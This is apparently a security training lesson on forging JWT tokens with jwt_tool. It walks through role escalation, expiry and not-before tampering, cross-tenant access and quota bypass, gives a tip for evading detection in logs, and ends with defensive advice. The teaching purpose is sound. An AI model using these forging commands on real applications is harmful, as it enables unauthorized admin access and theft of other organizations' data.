Claims Manipulation and Time-Based Attacks
Token Surgery: Manipulating JWT Claims for Privilege Escalation
What You'll Discover
🎯 Why This Matters
Once you understand how to manipulate JWT claims, you hold the keys to one of the most direct paths to privilege escalation in modern web applications. JWT tokens carry user identity and permissions as readable JSON data—and if you can modify this data and re-sign the token, you can become any user with any permissions. This is exactly how security professionals test for authorization flaws in real-world applications.
🔍 What You'll Learn
You'll master the art of JWT token surgery—systematically modifying user claims like roles and permissions, bypassing time-based security controls by manipulating expiration dates, and forging tokens that grant administrative access. These are the exact techniques that penetration testers use to demonstrate critical authorization vulnerabilities in production systems.
🚀 Your First Win
Within 5 minutes, you'll take a regular user token and transform it into an admin token using jwt_tool's interactive tamper mode. You'll see exactly how claims manipulation works in practice and understand why proper server-side validation is critical for application security.
🔧 Try This Right Now
Let's perform token surgery on this example JWT to change a regular user into an admin. This is the exact process security consultants use to test authorization controls.
# Example token with 'user' role that we'll escalate to 'admin'
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.\
eyJzdWIiOiJoZG5hX3VzZXJfMTIzIiwibmFtZSI6IkpvaG4gRG9lIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2NDA5OTUyMDAsImV4cCI6MTY0MDk5ODgwMH0.\
hackerdna_signature"
# Launch jwt_tool in tamper mode (interactive token editing)
python3 jwt_tool.py $TOKEN -T
# JWT_tool first shows the token header for modification:
#
# Token header values:
# [1] alg = "HS256"
# [2] typ = "JWT"
# [3] *ADD A VALUE*
# [4] *DELETE A VALUE*
# [0] Continue to next step
#
# Select [0] to continue to payload section
#
# Token payload values:
# [1] sub = "hdna_user_123"
# [2] name = "John Doe"
# [3] role = "user" ← Select this one
# [4] iat = 1640995200
# [5] exp = 1640998800 ← And this one
# [6] *ADD A VALUE*
# [7] *DELETE A VALUE*
# [0] Continue to next step
# Modify role: user → admin
# Extend expiration: 1640998800 → 1672534800 (1 year later)You'll see: JWT_tool's interactive interface lets you modify any claim with surgical precision, then automatically re-signs the token—giving you a forged admin token that applications will trust.
Understanding JWT Claims
JWT claims are key-value pairs that carry user identity and permissions—if you can modify these and re-sign the token, you control what the application believes about the user
The power of JWT claims manipulation lies in understanding that tokens carry their authorization data with them. Unlike session-based authentication where permissions are stored server-side, JWTs embed user roles and permissions directly in the token. This design makes them incredibly fast and scalable—but also means that anyone who can forge valid tokens can grant themselves any permissions.
Standard Claims (RFC 7519)
Official JWT specification claims
"sub": "hdna_user_123" // User ID
"iss": "auth.hackerdna.com" // Issuer
"aud": "api.hackerdna.com" // Audience
"exp": 1640998800 // Expiration
"nbf": 1640995200 // Not before
"iat": 1640995200 // Issued at
"jti": "abc123" // JWT IDCustom Claims
Application-defined permissions
"role": "admin" // User role
"permissions": ["read", "write"]
"department": "finance" // Access scope
"is_premium": true // Feature flags
"api_quota": 10000 // Rate limits
"tenant_id": "company" // Multi-tenantAttack Targets
High-impact manipulation targets
// Privilege escalation
"role": "user" → "admin"
"is_admin": false → true
"permissions": [] → ["*"]
// Persistence
"exp": [current] → [future]
"sub": "user" → "admin"Professional Token Manipulation with JWT_Tool
JWT_tool's tamper mode provides the most efficient way to perform surgical modifications on JWT tokens. Security professionals worldwide use this tool for authorization testing because it automates the complex cryptographic work while giving you precise control over every claim.
Interactive Tamper Mode
The tamper mode gives you a user-friendly interface to modify any part of a JWT token, automatically handling the base64 encoding and signature generation.
Step-by-Step Token Surgery
# Step 1: Launch tamper mode with your target token
python3 jwt_tool.py [YOUR_TOKEN] -T
# Step 2: JWT_tool launches interactive tamper mode
# You'll see an interface like this:
#
# =============================================
# Original JWT:
# [shows original token]
# =============================================
#
# jwttool_[id] - Tampered token:
# [shows current state of modifications]
# =============================================
#
# Please select a field number from the payload to tamper with:
# [1] sub
# [2] name
# [3] role
# [4] department
# [5] exp
# [6] Add new claim
# [0] Continue to next step
# Step 3: Make your modifications (example session)
# Select option 3 to modify role
# Current value of role is: user
# Please enter new value and hit ENTER
# > admin
# Select option 5 to modify expiration
# Current value of exp is: 1640998800
# Please enter new value and hit ENTER
# > 1672534800 # (1 year later)
# Step 4: Choose signing method if secret is known
# Select [S] Sign token with HS256 key
# Enter key: [YOUR_KNOWN_SECRET]This interactive approach lets you see exactly what you're changing and verify the results—perfect for learning and precise testing.
Command-Line Token Forging
For automated testing and repeated attacks, command-line parameters let you modify specific claims without interactive prompts.
Direct Claim Modification Commands
# Privilege escalation: Change role to admin
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc role -pv admin
# Time manipulation: Extend expiration by 1 year (31536000 seconds)
# Extract current expiration from token
PAYLOAD=$(echo $TOKEN | cut -d'.' -f2)
CURRENT_EXP=$(echo "$PAYLOAD====" | base64 -d 2>/dev/null | jq -r '.exp // empty')
NEW_EXP=$((CURRENT_EXP + 31536000))
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc exp -pv $NEW_EXP
# Multi-claim attack: Change role AND extend expiration
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc role -pv admin -pc exp -pv 1672534800
# Permission escalation: Add admin permissions array
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc permissions -pv '["read","write","delete","admin"]'
# User impersonation: Change subject ID to target admin user
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc sub -pv "hdna_admin_001"These commands give you surgical precision for specific attack scenarios while maintaining the speed needed for comprehensive testing.
Advanced Payload Crafting
For complex attacks involving multiple claims or sophisticated payloads, you can craft custom JSON payloads and inject them directly.
Custom Payload Injection
# Create malicious payload with multiple privilege escalations
cat > malicious_payload.json << 'EOF'
{
"sub": "hdna_superuser",
"name": "System Administrator",
"role": "superadmin",
"permissions": ["*"],
"is_admin": true,
"is_superuser": true,
"department": "IT",
"api_quota": 999999,
"exp": 1672534800,
"iat": 1640995200,
"nbf": 1640995200
}
EOF
# Method 1: Use jwt_tool with multiple claim modifications
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I \
-pc sub -pv "hdna_superuser" \
-pc role -pv "superadmin" \
-pc permissions -pv '["*"]' \
-pc is_admin -pv true \
-pc api_quota -pv 999999
# Method 2: Manual token construction with custom payload
# Alternative: Base64 encode and inject directly
PAYLOAD=$(cat malicious_payload.json | base64 -w 0 | tr '+/' '-_' | tr -d '=')
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.$PAYLOAD.[SIGNATURE]"This approach gives you complete control over the token structure—perfect for testing how applications handle unexpected or malicious claim combinations.
Time-Based Attack Techniques
Time-based claims in JWTs control when tokens are valid and who can use them. Manipulating these claims lets you extend token lifetimes, bypass activation delays, and create persistent access—critical techniques for maintaining long-term access during security assessments.
Expiration (exp) Manipulation
The 'exp' claim determines when a token expires. By extending this time far into the future, you create persistent access that survives normal token refresh cycles.
Strategic Expiration Extension
# Check current expiration time
echo "[TOKEN_PAYLOAD]" | base64 -d | jq .exp
# Output: 1640998800 (expires in 1 hour)
# Convert to human readable (macOS/BSD)
date -r 1640998800
# Output: Fri Dec 31 15:00:00 PST 2021
# Or for Linux: date -d @1640998800
# Extend by 1 year (31536000 seconds)
NEW_EXP=$((1640998800 + 31536000))
echo $NEW_EXP # 1672534800
# Forge token with extended expiration
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc exp -pv $NEW_EXPProfessional Tip: Realistic Extensions
Set expiration times that look realistic to avoid detection. Instead of 100 years, use 30-90 days—long enough for persistent access but not obviously malicious in security logs.
Not Before (nbf) Bypass
The 'nbf' (not before) claim prevents tokens from being used before a specific time. Applications use this for scheduled access or delayed activation—but you can bypass it by modifying the timestamp.
Early Access Attack
# Scenario: Token valid starting January 1, 2025
# Original nbf: 1735689600 (Jan 1, 2025 00:00:00 UTC)
# Current time: 1640995200 (Dec 31, 2021)
# Check current time in Unix timestamp
date +%s
# Output: 1640995200 (before nbf, so token rejected)
# Modify nbf to current time or earlier for immediate access
CURRENT_TIME=$(date +%s)
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc nbf -pv $CURRENT_TIME
# Or remove nbf claim entirely
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc nbf -pv nullIssued At (iat) Manipulation
The 'iat' (issued at) claim records when the token was created. Some applications use this for additional security checks or to invalidate tokens issued before password changes.
Strategic Timestamp Manipulation
# Make token appear freshly issued (bypass stale token checks)
CURRENT_TIME=$(date +%s)
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc iat -pv $CURRENT_TIME
# Make token appear issued before password change (if app checks this)
# Password changed at: 1640995200
# Set iat to before password change: 1640991600 (1 hour earlier)
BEFORE_PWD_CHANGE=1640991600
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc iat -pv $BEFORE_PWD_CHANGE
# Multi-time attack: Coordinate all time claims
TIME_BASE=1640995200
IAT=$TIME_BASE
NBF=$TIME_BASE
EXP=$((TIME_BASE + 31536000)) # +1 year
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc iat -pv $IAT -pc nbf -pv $NBF -pc exp -pv $EXPReal-World Attack Scenarios
These scenarios represent actual attack patterns that security professionals use to test authorization controls in production applications. Each demonstrates a different aspect of claims manipulation and its real-world impact.
Scenario 1: The Classic Role Escalation (5 minutes)
The most common and highest-impact attack: converting a regular user token into an administrator token by modifying the role claim.
Attack Execution
# Original token (regular user)
# Payload: {"sub": "hdna_user_789", "name": "John Doe", "role": "user"}
# Step 1: Identify the role claim structure
echo "[TOKEN_PAYLOAD]" | base64 -d | jq .
# Step 2: Modify role from 'user' to 'admin'
python3 jwt_tool.py $TOKEN -S hs256 -p "discovered_secret" -I -pc role -pv admin
# Step 3: Test the forged token against admin endpoints
curl -H "Authorization: Bearer [FORGED_TOKEN]" https://<target>/admin/users
# Expected result: Access granted to administrative functionsImpact Assessment
Complete administrative access to the application, including user management, system configuration, and sensitive data access—the same impact achieved by successful privilege escalation attacks in real security assessments.
Scenario 2: Multi-Tenant Data Access (10 minutes)
In multi-tenant applications, JWT tokens often contain tenant_id claims that control which organization's data users can access. Modifying this claim grants access to other organizations' data.
Cross-Tenant Attack
# Original token (HackerDNA Labs user)
# Payload: {"sub": "hdna_user_456", "tenant_id": "hackerdna_labs", "role": "admin"}
# Step 1: Enumerate other tenant IDs (reconnaissance)
# Methods: subdomain enumeration, error messages, public information
# Step 2: Modify tenant_id to target organization
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I -pc tenant_id -pv hdna_enterprise
# Step 3: Access target organization's data
curl -H "Authorization: Bearer [FORGED_TOKEN]" https://<target>/api/customers
# Result: Access to HDNA Enterprise's customer database using HackerDNA Labs credentialsCritical Business Impact
This represents a catastrophic data breach where one organization can access competitors' sensitive data—a violation that can result in regulatory penalties, lawsuits, and complete loss of customer trust.
Scenario 3: API Rate Limit Bypass (15 minutes)
Some applications embed API quotas and rate limiting information directly in JWT tokens. Modifying these claims can bypass usage restrictions and enable unlimited API access.
Quota Manipulation Attack
# Original token (limited user)
# Payload: {"sub": "hdna_user_123", "api_quota": 1000, "rate_limit": "100/hour"}
# Step 1: Identify rate limiting claims
echo "[TOKEN_PAYLOAD]" | base64 -d | jq 'to_entries[] | select(.key | contains("quota", "limit", "rate"))'
# Step 2: Escalate to unlimited access
python3 jwt_tool.py $TOKEN -S hs256 -p "hackerdna_secret" -I \
-pc api_quota -pv 999999999 \
-pc rate_limit -pv "unlimited" \
-pc is_premium -pv true
# Step 3: Test unlimited access
for i in {1..10000}; do
curl -H "Authorization: Bearer [FORGED_TOKEN]" https://<target>/expensive-endpoint
doneResource Abuse Potential
Unlimited API access can be weaponized for data scraping, service overload attacks, or resource abuse that costs the organization significant money in cloud computing fees.
Detection and Defense Strategies
Understanding attack techniques enables you to implement proper defenses. Here's how security professionals protect applications against claims manipulation attacks.
Server-Side Validation Architecture
Secure Implementation Pattern
// SECURE: Server-side permission checking
function authorizeUserAction(jwt_token, required_permission) {
// Step 1: Verify JWT signature and expiration
const decoded = jwt.verify(token, SECRET_KEY, {algorithms: ['RS256']});
// Step 2: Fetch CURRENT user permissions from database
const user_permissions = database.getUserPermissions(decoded.sub);
// Step 3: Check permission server-side (never trust JWT claims)
if (!user_permissions.includes(required_permission)) {
throw new Error('Insufficient permissions');
}
// Step 4: Validate business rules (tenant isolation, etc.)
if (decoded.tenant_id !== user.tenant_id) {
throw new Error('Cross-tenant access denied');
}
return true;
}
// VULNERABLE: Trusting JWT claims without verification
function insecureAuthorization(jwt_token) {
const decoded = jwt.decode(token); // No signature verification!
if (decoded.role === 'admin') { // Trusting client-provided data!
return grantAdminAccess();
}
}The key principle: JWT tokens should be used for authentication (who you are) but never authorization (what you can do) without server-side validation.
Security Monitoring and Detection
Anomaly Detection
- Token modification patterns - Detect tokens with unusual claim combinations
- Time anomalies - Flag tokens with suspiciously long expiration times
- Permission escalation - Monitor for rapid privilege changes
- Cross-tenant access - Alert on tenant_id mismatches
Technical Controls
- Short token lifetimes - 15-minute expiration reduces attack windows
- Token binding - Tie tokens to specific devices/IPs
- Claim validation - Whitelist allowed claim values
- Audit logging - Log all token usage and modifications
🎯 Your Claims Manipulation Expertise is Complete!
You now understand JWT claims manipulation like a security expert. You can perform surgical token modifications to escalate privileges, bypass time-based controls, and forge tokens that grant unauthorized access—plus you know how to implement proper server-side defenses that prevent these attacks.
Ready to Apply Advanced JWT Security Techniques